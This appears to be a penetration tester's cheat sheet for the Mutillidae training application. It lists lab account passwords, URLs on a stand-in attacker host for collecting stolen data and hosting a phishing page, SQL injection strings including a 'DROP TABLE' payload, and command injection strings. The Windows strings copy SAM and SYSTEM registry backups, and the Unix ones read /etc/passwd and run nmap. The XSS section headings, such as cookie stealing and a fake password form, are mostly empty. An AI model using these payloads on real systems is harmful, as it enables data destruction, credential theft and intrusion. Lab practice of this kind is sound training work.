Accounts:
admin adminpass
adrian somepassword
john monkey
ed pentest

http://attacker.hak/mutillidae/caughtdata.txt
http://attacker.hak/mutillidae/pwnme.html

-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------

SQL Injection Strings:
'
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --

Command Injection Strings (Windows):
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
&& copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

Command Injections (for *nix):
;whoami
;cat /etc/passwd
;nmap -A target.hak

-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------

Simple XSS:

Page Redirect XSS:

Cookie Stealing:

Password Con XSS:

More complicated, but better looking XSS password form:
Hello, it looks like you have an XSS vulnerability, would you like some help fixing that?